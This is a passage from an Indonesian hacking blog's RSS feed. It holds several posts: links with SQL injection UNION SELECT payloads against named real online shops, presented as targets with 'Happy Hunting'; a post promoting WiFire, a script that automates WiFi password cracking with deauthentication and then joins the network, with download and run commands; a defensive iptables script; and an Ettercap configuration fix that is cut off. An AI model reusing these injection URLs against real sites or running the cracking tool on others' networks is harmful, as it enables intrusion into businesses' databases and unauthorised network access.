href="http://www.natural-insect-control.com/product.php?id=000000283+and+1=0+union+select+1,@@version,3,4--" target="_blank"&gt;Vulnerable 3&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;a href="http://www.caribee.com/product.php?prd=66+AnD+1=2+UnIoN+SeLeCt+1,@@version,3,4,5,6,7,8,9,10,11,12--" target="_blank"&gt;Vulnerable 4&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;a href="http://www.spray-shop.co.uk/product.php?id=-1+UNION+ALL+SELECT+1,@@version,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,20,21--" target="_blank"&gt;Vulnerable 5&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Happy Hunting =)&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;red-dragon&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4322924474312123143-1860572654239221324?l=www.root-bt.co.cc' alt='' /&gt;&lt;/div&gt;</description><link>http://www.root-bt.co.cc/2012/02/powerful-dork-for-sqli-1.html</link><author>noreply@blogger.com (Double Dragon)</author><thr:total>4</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-4322924474312123143.post-5314038082012666570</guid><pubDate>Fri, 10 Feb 2012 06:31:00 +0000</pubDate><atom:updated>2012-02-10T13:31:20.057+07:00</atom:updated><category domain='http://www.blogger.com/atom/ns#'>bash command</category><category domain='http://www.blogger.com/atom/ns#'>Script</category><category domain='http://www.blogger.com/atom/ns#'>Aircrack</category><title>[SCRIPT] Cracking Password WiFi Otomatis dengan WiFire</title><description>&lt;span class="fullpost"&gt;Beberapa hari yang lalu saya pernah membuatkan script untuk mempermudah setting pada network kamu. Sekarang, saatnya lebih serius. Saya telah membuat sebuah script (Lebih optimal jika dijalankan di BackTrack) yang berfungsi untuk melakukan cracking password WiFi secara otomatis berdasarkan software AirCrack-ng dan MacChanger.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;Script ini diberi nama WiFire. Ada beberapa fitur unggulan script ini, diantaranya: &lt;/span&gt;&lt;br /&gt;&lt;ol&gt;&lt;li&gt;&lt;span class="fullpost"&gt;Bisa melakukan konfigurasi Wordlist&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span class="fullpost"&gt;Mendeteksi client WiFi&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span class="fullpost"&gt;Mendeteksi teknologi enkripsi WiFi&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span class="fullpost"&gt;Otomatis melakukan attacking dan cracking password&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span class="fullpost"&gt;Otomatis mencoba masuk ke dalam jaringan setelah password ditemukan&lt;/span&gt;&lt;/li&gt;&lt;/ol&gt;&lt;span class="fullpost"&gt;Berikut adalah gambaran script ini:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;b&gt;&lt;span class="fullpost"&gt;Memilih Dictionary&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-eIotCkeFskA/TzS3d_7_TxI/AAAAAAAABOg/5EbJ9VI8CzY/s1600/wifire-choose-dic.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="195" src="http://1.bp.blogspot.com/-eIotCkeFskA/TzS3d_7_TxI/AAAAAAAABOg/5EbJ9VI8CzY/s400/wifire-choose-dic.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;b&gt;&lt;span class="fullpost"&gt;Memilih Access Point&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-bif_g-DjpzI/TzS3somupBI/AAAAAAAABOo/PR6LjKjg34s/s1600/wifire-choose-ap.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="256" src="http://3.bp.blogspot.com/-bif_g-DjpzI/TzS3somupBI/AAAAAAAABOo/PR6LjKjg34s/s400/wifire-choose-ap.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;b&gt;&lt;span class="fullpost"&gt;&amp;nbsp;Attack Fake Authentication&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-qe4-8ZWU9sg/TzS3_Y7HcHI/AAAAAAAABOw/Eif7d61WejQ/s1600/wifire-attack-fakeauth.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="179" src="http://2.bp.blogspot.com/-qe4-8ZWU9sg/TzS3_Y7HcHI/AAAAAAAABOw/Eif7d61WejQ/s320/wifire-attack-fakeauth.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;b&gt;&lt;span class="fullpost"&gt;Attack Deauthentication Single Mac&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-9t3Efv79p-U/TzS4Zp-I7pI/AAAAAAAABO4/KnHDELuLjbI/s1600/wifire-attack-deauth.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="179" src="http://1.bp.blogspot.com/-9t3Efv79p-U/TzS4Zp-I7pI/AAAAAAAABO4/KnHDELuLjbI/s320/wifire-attack-deauth.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;b&gt;&lt;span class="fullpost"&gt;Attack Deauthentication All Client&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-EKMtrhxRN6g/TzS4tAErc2I/AAAAAAAABPA/B_BuI5oZyYw/s1600/wifire-attack-deauth-all-client.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="179" src="http://1.bp.blogspot.com/-EKMtrhxRN6g/TzS4tAErc2I/AAAAAAAABPA/B_BuI5oZyYw/s320/wifire-attack-deauth-all-client.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: left;"&gt;&lt;span class="fullpost"&gt;Untuk mendownload script ini, gunakan perintah git pada terminal kamu:&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: left;"&gt;&lt;span class="fullpost"&gt; &lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: left;"&gt;&lt;b&gt;&lt;span class="fullpost"&gt;root@bt:~# git clone https://github.com/blusp10it/WiFire&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style="text-align: left;"&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: left;"&gt;&lt;span class="fullpost"&gt;Setelah itu:&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: left;"&gt;&lt;b&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style="text-align: left;"&gt;&lt;b&gt;&lt;span class="fullpost"&gt;root@bt:~# cd WiFire/&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style="text-align: left;"&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: left;"&gt;&lt;span class="fullpost"&gt;Dan untuk mengekseusi script-nya, gunakan perintah:&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: left;"&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: left;"&gt;&lt;span class="fullpost"&gt;&lt;b&gt;root@bt:~/WiFire# bash WiFire&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: left;"&gt;&lt;span class="fullpost"&gt;Selamat mencoba (= &lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: left;"&gt;&lt;span class="fullpost"&gt;Script by &lt;span style="color: cyan;"&gt;blusp10it&lt;/span&gt;&amp;nbsp;&lt;/span&gt;&lt;span class="fullpost"&gt; &lt;/span&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4322924474312123143-5314038082012666570?l=www.root-bt.co.cc' alt='' /&gt;&lt;/div&gt;</description><link>http://www.root-bt.co.cc/2012/02/script-cracking-password-wifi-otomatis.html</link><author>noreply@blogger.com (Double Dragon)</author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/-eIotCkeFskA/TzS3d_7_TxI/AAAAAAAABOg/5EbJ9VI8CzY/s72-c/wifire-choose-dic.png' height='72' width='72'/><thr:total>10</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-4322924474312123143.post-5436470835032438681</guid><pubDate>Tue, 07 Feb 2012 16:44:00 +0000</pubDate><atom:updated>2012-02-07T23:44:02.338+07:00</atom:updated><category domain='http://www.blogger.com/atom/ns#'>bash command</category><category domain='http://www.blogger.com/atom/ns#'>Script</category><category domain='http://www.blogger.com/atom/ns#'>linux</category><category domain='http://www.blogger.com/atom/ns#'>BackTrack</category><title>FireNix, Konfigurasi Network Linux</title><description>&lt;span class="fullpost"&gt;Beberapa hari ini, saya membuat sebuah script sederhana yang bisa digunakan di semua distro Linux. Script ini berfungsi untuk melakukan setting Firewall berdasarkan IPTables dan ARPTables.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;Script ini telah diuji dan sedang dalam pengembangan. Beberapa fitur yang ada dalam script ini adalah: &lt;/span&gt;&lt;br /&gt;&lt;ol&gt;&lt;li&gt;&lt;span class="fullpost"&gt;Memasang firewall dengan konfigurasi yang mendasar&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span class="fullpost"&gt;Melakukan reset settingan firewall&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span class="fullpost"&gt;Menutup port yang terbuka&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span class="fullpost"&gt;Memblokir IP yang diduga sebagai attacker&lt;/span&gt;&lt;/li&gt;&lt;/ol&gt;&lt;span class="fullpost"&gt;Keuntungan menggunakan script ini adalah, mempermudah kita dalam mempertahankan diri dari serangan sniffer. Karena, dengan mengaktifkan fungsi firewall pada software ini, IP kamu tidak akan bisa di PING (=&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Untuk mendownload, kamu bisa gunakan perintah git:&lt;br /&gt;&lt;br /&gt;&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;# git clone https://github.com/blusp10it/FireNix&lt;br /&gt;&lt;br /&gt;Lalu jalankan scriptnya dengan perintah:&lt;br /&gt;&lt;br /&gt;# bash FireNix&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;Tampilan FireNix&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-vMzHh6W10Hg/TzFRoO_DbkI/AAAAAAAABNg/SfNNQyCaxKk/s1600/tampilan-firenix.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="400" src="http://2.bp.blogspot.com/-vMzHh6W10Hg/TzFRoO_DbkI/AAAAAAAABNg/SfNNQyCaxKk/s400/tampilan-firenix.png" width="296" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Memasang FireWall&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-89OdSWOSpPo/TzFR8T12iqI/AAAAAAAABNo/_S5lNOkcJvA/s1600/firenix-memasangFirewall.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="400" src="http://3.bp.blogspot.com/-89OdSWOSpPo/TzFR8T12iqI/AAAAAAAABNo/_S5lNOkcJvA/s400/firenix-memasangFirewall.png" width="296" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;Mereset Setting FireWall&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-hhyRJ8TBVXE/TzFSmp_A1uI/AAAAAAAABN4/wjzOvRB7z7g/s1600/firenix-meresetFirewall.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="400" src="http://1.bp.blogspot.com/-hhyRJ8TBVXE/TzFSmp_A1uI/AAAAAAAABN4/wjzOvRB7z7g/s400/firenix-meresetFirewall.png" width="296" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;Mengecek Status FireWall&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-4SdXikRiyRA/TzFSRyDFsLI/AAAAAAAABNw/-n4Sq8OeoRE/s1600/firenix-cekstatusFirewall.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="172" src="http://3.bp.blogspot.com/-4SdXikRiyRA/TzFSRyDFsLI/AAAAAAAABNw/-n4Sq8OeoRE/s320/firenix-cekstatusFirewall.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;Memblokir IP Attacker&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-AcNXV_7bEj8/TzFS_JzhctI/AAAAAAAABOA/f-9021hgdwg/s1600/firenix-blockAttacker.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="333" src="http://4.bp.blogspot.com/-AcNXV_7bEj8/TzFS_JzhctI/AAAAAAAABOA/f-9021hgdwg/s400/firenix-blockAttacker.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;Cek Port yang Terbuka&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-2IlVr_XKOlQ/TzFTXPiDe0I/AAAAAAAABOI/VMk0Wz0QGx0/s1600/firenix-menutupPort.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="333" src="http://3.bp.blogspot.com/-2IlVr_XKOlQ/TzFTXPiDe0I/AAAAAAAABOI/VMk0Wz0QGx0/s400/firenix-menutupPort.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;Script By&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-hjgrAIA1ghU/TzFTr4hOBXI/AAAAAAAABOQ/kouNiyIgGrY/s1600/credit-firenix.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="333" src="http://2.bp.blogspot.com/-hjgrAIA1ghU/TzFTr4hOBXI/AAAAAAAABOQ/kouNiyIgGrY/s400/credit-firenix.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;Bye bye (=&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-KVATdI7y2Kk/TzFT-CXCvOI/AAAAAAAABOY/t1xyGrNuO9U/s1600/firenix-bye.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="258" src="http://3.bp.blogspot.com/-KVATdI7y2Kk/TzFT-CXCvOI/AAAAAAAABOY/t1xyGrNuO9U/s400/firenix-bye.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: left;"&gt;View Repository: &lt;a href="https://github.com/blusp10it/FireNix"&gt;https://github.com/blusp10it/FireNix&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: left;"&gt;Add me on FaceBook: &lt;a href="https://www.facebook.com/blusp10it"&gt;https://www.facebook.com/blusp10it&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: left;"&gt;Are you &lt;b style="color: cyan;"&gt;blusp10it&lt;/b&gt;?&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4322924474312123143-5436470835032438681?l=www.root-bt.co.cc' alt='' /&gt;&lt;/div&gt;</description><link>http://www.root-bt.co.cc/2012/02/firenix-konfigurasi-network-linux.html</link><author>noreply@blogger.com (Double Dragon)</author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/-vMzHh6W10Hg/TzFRoO_DbkI/AAAAAAAABNg/SfNNQyCaxKk/s72-c/tampilan-firenix.png' height='72' width='72'/><thr:total>3</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-4322924474312123143.post-6807368700418875473</guid><pubDate>Tue, 07 Feb 2012 06:08:00 +0000</pubDate><atom:updated>2012-02-07T13:08:58.943+07:00</atom:updated><category domain='http://www.blogger.com/atom/ns#'>Fix</category><category domain='http://www.blogger.com/atom/ns#'>ettercap</category><category domain='http://www.blogger.com/atom/ns#'>redir_command_on</category><category domain='http://www.blogger.com/atom/ns#'>etter.conf</category><category domain='http://www.blogger.com/atom/ns#'>error</category><category domain='http://www.blogger.com/atom/ns#'>bug</category><category domain='http://www.blogger.com/atom/ns#'>ip_forwarding was disabled</category><category domain='http://www.blogger.com/atom/ns#'>redir_command_off</category><title>FIX Ettercap ip_forwarding was disabled, but we cannot re-enable it now</title><description>Ettercap mengalami banyak bug pada backtrack 5 R1. Kali ini bug memunculkan pesan error:&lt;span class="fullpost"&gt; &lt;/span&gt;&lt;br /&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div&gt;ip_forwarding was disabled, but we cannot re-enable it now.&lt;/div&gt;&lt;div&gt;remember to re-enable it manually&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-7qghir3BNmQ/TzC9aueYTLI/AAAAAAAABNQ/NKY3iQpgSCs/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="195" src="http://1.bp.blogspot.com/-7qghir3BNmQ/TzC9aueYTLI/AAAAAAAABNQ/NKY3iQpgSCs/s320/2.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Bagaimana cara mengatasinya?&lt;/div&gt;&lt;div&gt;&lt;a name='more'&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="color: cyan; font-size: large;"&gt;1. Buka terminal, lalu masukan perintah:&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="color: white; font-family: 'Courier New', Courier, FreeMono, monospace; font-size: 13px; line-height: 18px;"&gt;&lt;div class="title" style="background-color: black; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-family: Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px; text-align: left;"&gt;&lt;span class="Apple-style-span" style="color: lime;"&gt;Command:&lt;/span&gt;&lt;/div&gt;&lt;div class="body" dir="ltr" style="background-color: black; text-align: left;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;root@revolution&lt;/span&gt;&lt;span class="Apple-style-span" style="color: lime;"&gt;:&lt;/span&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;/&lt;/span&gt;&lt;span class="Apple-style-span" style="color: lime;"&gt;# nano /usr/local/etc/etter.conf&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/div&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Maka anda akan melihat tampilan seperti ini:&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="color: red; font-family: monospace; font-size: 13px; line-height: 18px;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;########################################################################&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;# &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;#&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;# &amp;nbsp;ettercap -- etter.conf -- configuration file &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;#&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;# &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;#&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;# &amp;nbsp;Copyright (C) ALoR &amp;amp; NaGA &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; #&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;# &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;#&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;# &amp;nbsp;This program is free software; you can redistribut it and/or moify &amp;nbsp;#&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;# &amp;nbsp;it under the terms of the GNU General Public Licese as publishedby &amp;nbsp;#&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;# &amp;nbsp;the Free Software Foundation; either version 2 o the License, or &amp;nbsp; &amp;nbsp;#&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;# &amp;nbsp;(at your option) any later version. &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; #&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;# &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; 